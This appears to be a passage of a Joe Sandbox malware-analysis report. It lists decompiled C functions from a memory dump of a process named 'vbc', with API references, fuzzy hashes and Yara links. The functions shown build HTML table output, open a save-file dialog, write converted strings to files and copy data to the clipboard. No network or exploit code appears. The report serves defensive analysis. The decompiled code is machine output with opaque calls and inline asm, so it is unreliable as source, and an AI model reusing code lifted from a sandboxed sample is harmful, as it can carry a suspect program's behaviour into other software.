                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040E3BD,00000000,00000000), ref: 0040E8FD
                                                                                                                                                                        • memset.MSVCRT ref: 0040E95A
                                                                                                                                                                        • memset.MSVCRT ref: 0040E96C
                                                                                                                                                                          • Part of subcall function 0040E7E3: strcpy.MSVCRT(?,-00000001), ref: 0040E809
                                                                                                                                                                        • memset.MSVCRT ref: 0040EA53
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040EA78
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0040E3BD,?), ref: 0040EAC2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3799309942-0
                                                                                                                                                                        • Opcode ID: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                        • Instruction ID: 2a82ac7989168376751b009825c1859dcdea9a7a89aff0dc4cc4404167d83f81
                                                                                                                                                                        • Opcode Fuzzy Hash: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 79512EB1A00218AFDB10DF95CD85ADEBBB8FB48304F1445AAF505A2281DB749F90CF69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004094DC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			E004094DC(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405F07(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F6E2(_v28,  &_v68);
						E0040F70E( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F797( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405F07(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405F07(_a4, 0x413b1c);
			}























                                                                                                                                                                        0x004094dc
                                                                                                                                                                        0x004094e6
                                                                                                                                                                        0x004094ef
                                                                                                                                                                        0x004094ef
                                                                                                                                                                        0x004094f1
                                                                                                                                                                        0x004094fb
                                                                                                                                                                        0x004094fc
                                                                                                                                                                        0x004094fd
                                                                                                                                                                        0x004094fe
                                                                                                                                                                        0x004094ff
                                                                                                                                                                        0x00409509
                                                                                                                                                                        0x0040950a
                                                                                                                                                                        0x0040950f
                                                                                                                                                                        0x00409516
                                                                                                                                                                        0x0040951c
                                                                                                                                                                        0x0040951f
                                                                                                                                                                        0x00409525
                                                                                                                                                                        0x00409530
                                                                                                                                                                        0x00409533
                                                                                                                                                                        0x00409535
                                                                                                                                                                        0x00409535
                                                                                                                                                                        0x00409538
                                                                                                                                                                        0x0040953b
                                                                                                                                                                        0x0040953f
                                                                                                                                                                        0x00409543
                                                                                                                                                                        0x00409547
                                                                                                                                                                        0x00409551
                                                                                                                                                                        0x0040955a
                                                                                                                                                                        0x00409564
                                                                                                                                                                        0x0040957a
                                                                                                                                                                        0x0040958a
                                                                                                                                                                        0x0040958d
                                                                                                                                                                        0x00409590
                                                                                                                                                                        0x00409594
                                                                                                                                                                        0x004095a1
                                                                                                                                                                        0x004095a7
                                                                                                                                                                        0x004095b1
                                                                                                                                                                        0x004095c3
                                                                                                                                                                        0x004095ce
                                                                                                                                                                        0x004095d3
                                                                                                                                                                        0x004095d6
                                                                                                                                                                        0x004095d7
                                                                                                                                                                        0x0040951c
                                                                                                                                                                        0x004095f2

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        • strcat.MSVCRT(?,&nbsp;), ref: 004095A1
                                                                                                                                                                        • sprintf.MSVCRT ref: 004095C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWritesprintfstrcatstrlen
                                                                                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                        • API String ID: 3813295786-4153097237
                                                                                                                                                                        • Opcode ID: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                                                                                                                                                                        • Instruction ID: d2e4fb28aa3b1966a3fc448ecfbbe776d9831430555dea6067297da34f065eca
                                                                                                                                                                        • Opcode Fuzzy Hash: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F318F32900209AFDF15DF95C8869DE7BB5FF44314F1041AAFD10AB1E2D776A951CB84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411133 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                        			E00411133(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E00412360(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L00412090();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E004104AE( &_v5796, _t80);
				_v5796 = 0x41553c;
				E00410B65( &_v3636);
				E00410B65( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0041061F(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E0041072A(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060DA(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L00412096();
				return E00410596( &_v5796);
			}































                                                                                                                                                                        0x00411133
                                                                                                                                                                        0x0041113b
                                                                                                                                                                        0x00411146
                                                                                                                                                                        0x0041114b
                                                                                                                                                                        0x0041114b
                                                                                                                                                                        0x0041114e
                                                                                                                                                                        0x0041114f
                                                                                                                                                                        0x00411156
                                                                                                                                                                        0x00411161
                                                                                                                                                                        0x00411166
                                                                                                                                                                        0x00411168
                                                                                                                                                                        0x0041116e
                                                                                                                                                                        0x00411174
                                                                                                                                                                        0x0041117f
                                                                                                                                                                        0x00411189
                                                                                                                                                                        0x00411194
                                                                                                                                                                        0x00411199
                                                                                                                                                                        0x004111a2
                                                                                                                                                                        0x004111a8
                                                                                                                                                                        0x004111b1
                                                                                                                                                                        0x004111b4
                                                                                                                                                                        0x004111c5
                                                                                                                                                                        0x004111cf
                                                                                                                                                                        0x004111da
                                                                                                                                                                        0x004111dd
                                                                                                                                                                        0x004111e3
                                                                                                                                                                        0x004111e6
                                                                                                                                                                        0x004111f6
                                                                                                                                                                        0x004111fe
                                                                                                                                                                        0x00411212
                                                                                                                                                                        0x0041121a
                                                                                                                                                                        0x0041121e
                                                                                                                                                                        0x00411224
                                                                                                                                                                        0x00411224
                                                                                                                                                                        0x00411231
                                                                                                                                                                        0x00411231
                                                                                                                                                                        0x004111f6
                                                                                                                                                                        0x00411239
                                                                                                                                                                        0x00411246
                                                                                                                                                                        0x00411253
                                                                                                                                                                        0x00411253
                                                                                                                                                                        0x00411246
                                                                                                                                                                        0x00411255
                                                                                                                                                                        0x00411258
                                                                                                                                                                        0x0041126d

                                                                                                                                                                        APIs
                                                                                                                                                                        • wcslen.MSVCRT ref: 00411146
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104C3
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104E1
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104FC
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410525
                                                                                                                                                                          • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410549
                                                                                                                                                                        • strlen.MSVCRT ref: 004111AB
                                                                                                                                                                          • Part of subcall function 0041061F: ??3@YAXPAX@Z.MSVCRT ref: 0041062A
                                                                                                                                                                          • Part of subcall function 0041061F: ??2@YAPAXI@Z.MSVCRT ref: 00410639
                                                                                                                                                                        • memcpy.MSVCRT ref: 004111C5
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00411258
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 577244452-0
                                                                                                                                                                        • Opcode ID: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
                                                                                                                                                                        • Instruction ID: 068040a7654b3252a10ead66c722fc8ae16d1693d490f738ed846916017eff7d
                                                                                                                                                                        • Opcode Fuzzy Hash: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
                                                                                                                                                                        • Instruction Fuzzy Hash: 21314472D04219ABCF21EF65C8809DDBBB5AF49314F0481AAE608A3251CB396FD5CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040AC6E Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040AC6E(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E00407A69(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E00407A69(0x1f6);
				_v60 = _t59;
				_v56 = E00407A69(0x1f7);
				_v52 = _t59;
				_t32 = E00407A69(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E00407A69(0x1f9);
				_v36 = _t60;
				_v32 = E00407A69(0x1fa);
				_v28 = "*.xml";
				_t35 = E00407A69(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E00407A69(0x1fc);
				_v12 = _t61;
				E0040687C( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E00407A69(_t52);
				_t23 =  &_v8; // 0x747874
				return E004066AF(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}































                                                                                                                                                                        0x0040ac87
                                                                                                                                                                        0x0040ac8e
                                                                                                                                                                        0x0040ac9b
                                                                                                                                                                        0x0040aca2
                                                                                                                                                                        0x0040aca7
                                                                                                                                                                        0x0040acad
                                                                                                                                                                        0x0040acb0
                                                                                                                                                                        0x0040acbd
                                                                                                                                                                        0x0040acc0
                                                                                                                                                                        0x0040acc9
                                                                                                                                                                        0x0040accc
                                                                                                                                                                        0x0040accf
                                                                                                                                                                        0x0040acd4
                                                                                                                                                                        0x0040acde
                                                                                                                                                                        0x0040ace1
                                                                                                                                                                        0x0040acea
                                                                                                                                                                        0x0040aced
                                                                                                                                                                        0x0040acfa
                                                                                                                                                                        0x0040acfd
                                                                                                                                                                        0x0040ad04
                                                                                                                                                                        0x0040ad09
                                                                                                                                                                        0x0040ad0f
                                                                                                                                                                        0x0040ad12
                                                                                                                                                                        0x0040ad1a
                                                                                                                                                                        0x0040ad29
                                                                                                                                                                        0x0040ad2c
                                                                                                                                                                        0x0040ad35
                                                                                                                                                                        0x0040ad36
                                                                                                                                                                        0x0040ad3e
                                                                                                                                                                        0x0040ad5e

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040AC8E
                                                                                                                                                                          • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                          • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                          • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                          • Part of subcall function 0040687C: memset.MSVCRT ref: 0040689C
                                                                                                                                                                          • Part of subcall function 0040687C: sprintf.MSVCRT ref: 004068C9
                                                                                                                                                                          • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068D5
                                                                                                                                                                          • Part of subcall function 0040687C: memcpy.MSVCRT ref: 004068EA
                                                                                                                                                                          • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068F8
                                                                                                                                                                          • Part of subcall function 0040687C: memcpy.MSVCRT ref: 00406908
                                                                                                                                                                          • Part of subcall function 004066AF: GetSaveFileNameA.COMDLG32(?), ref: 004066FE
                                                                                                                                                                          • Part of subcall function 004066AF: strcpy.MSVCRT(?,?), ref: 00406715
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                        • API String ID: 4021364944-3614832568
                                                                                                                                                                        • Opcode ID: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                        • Instruction ID: b1b2e5a0efe066de17158a8bc8fa7ff9efe1d0f31d50f94681ee96e1b845f603
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                        • Instruction Fuzzy Hash: B82101B1E042199ED700EFE6D8817DEBBB4AB08704F10417FE509B7282D7382B458F5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403A67 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E00403A67(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E00412360(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                                                                                                                                        0x00403a6f
                                                                                                                                                                        0x00403a85
                                                                                                                                                                        0x00403a8c
                                                                                                                                                                        0x00403a9f
                                                                                                                                                                        0x00403aa5
                                                                                                                                                                        0x00403abc
                                                                                                                                                                        0x00403adb
                                                                                                                                                                        0x00403b07

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00403A8C
                                                                                                                                                                        • memset.MSVCRT ref: 00403AA5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403ABC
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403ADB
                                                                                                                                                                        • strlen.MSVCRT ref: 00403AED
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1786725549-0
                                                                                                                                                                        • Opcode ID: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                        • Instruction ID: 60d5cd2968a458345304ed859c80f0f17d47a7f7ae6e16c58bf0b652b2e175c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                        • Instruction Fuzzy Hash: B8116DB650012CBEFB009B94DD85DEBB7ADEF08354F0041A2B719E2091D6759F54CB78
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040ADA4(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AD61(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FD0(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F4B(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                                                                                                                                        0x0040ada4
                                                                                                                                                                        0x0040adaf
                                                                                                                                                                        0x0040adbe
                                                                                                                                                                        0x0040adc4
                                                                                                                                                                        0x0040adc6
                                                                                                                                                                        0x0040add0
                                                                                                                                                                        0x0040add0
                                                                                                                                                                        0x0040adeb
                                                                                                                                                                        0x0040adf2
                                                                                                                                                                        0x0040ae03
                                                                                                                                                                        0x0040ae0a
                                                                                                                                                                        0x0040ae12
                                                                                                                                                                        0x0040ae18
                                                                                                                                                                        0x0040ae1a
                                                                                                                                                                        0x0040ae2b
                                                                                                                                                                        0x0040ae1c
                                                                                                                                                                        0x0040ae23
                                                                                                                                                                        0x0040ae28
                                                                                                                                                                        0x0040ae33
                                                                                                                                                                        0x0040ae3b
                                                                                                                                                                        0x0040ae40
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ae48
                                                                                                                                                                        0x0040ae51

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040ADBE
                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ADD0
                                                                                                                                                                        • GetTempFileNameA.KERNEL32(?,0041444C,00000000,?), ref: 0040ADF2
                                                                                                                                                                        • OpenClipboard.USER32(?), ref: 0040AE12
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040AE2B
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040AE48
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2014771361-0
                                                                                                                                                                        • Opcode ID: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                        • Instruction ID: 7dfed4210218cbe3633ab85fc006b2e48c808a0cdacf0b0ca9692cf87dba871e
                                                                                                                                                                        • Opcode Fuzzy Hash: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                        • Instruction Fuzzy Hash: 071165725443186BDB209B61DC49FCB7BBCAF14706F0441B6F689E2091EB78DAC48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410596 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                        			E00410596(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x415314;
				if(_t9 != 0) {
					_push(_t9);
					L00412096();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B8A(_t18);
					_push(_t18);
					L00412096();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B8A(_t19);
					_push(_t19);
					L00412096();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B8A(_t20);
					_push(_t20);
					L00412096();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A7D(_t21);
					_push(_t21);
					L00412096();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A7D(_t22);
					_push(_t22);
					L00412096();
				}
				return _t9;
			}











                                                                                                                                                                        0x00410596
                                                                                                                                                                        0x00410596
                                                                                                                                                                        0x0041059b
                                                                                                                                                                        0x004105a1
                                                                                                                                                                        0x004105a3
                                                                                                                                                                        0x004105a4
                                                                                                                                                                        0x004105a9
                                                                                                                                                                        0x004105ad
                                                                                                                                                                        0x004105af
                                                                                                                                                                        0x004105b7
                                                                                                                                                                        0x004105b9
                                                                                                                                                                        0x004105be
                                                                                                                                                                        0x004105bf
                                                                                                                                                                        0x004105c4
                                                                                                                                                                        0x004105c5
                                                                                                                                                                        0x004105cd
                                                                                                                                                                        0x004105cf
                                                                                                                                                                        0x004105d4
                                                                                                                                                                        0x004105d5
                                                                                                                                                                        0x004105da
                                                                                                                                                                        0x004105db
                                                                                                                                                                        0x004105e3
                                                                                                                                                                        0x004105e5
                                                                                                                                                                        0x004105ea
                                                                                                                                                                        0x004105eb
                                                                                                                                                                        0x004105f0
                                                                                                                                                                        0x004105f1
                                                                                                                                                                        0x004105f9
                                                                                                                                                                        0x004105fb
                                                                                                                                                                        0x00410600
                                                                                                                                                                        0x00410601
                                                                                                                                                                        0x00410606
                                                                                                                                                                        0x00410607
                                                                                                                                                                        0x0041060f
                                                                                                                                                                        0x00410611
                                                                                                                                                                        0x00410616
                                                                                                                                                                        0x00410617
                                                                                                                                                                        0x0041061c
                                                                                                                                                                        0x0041061e

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
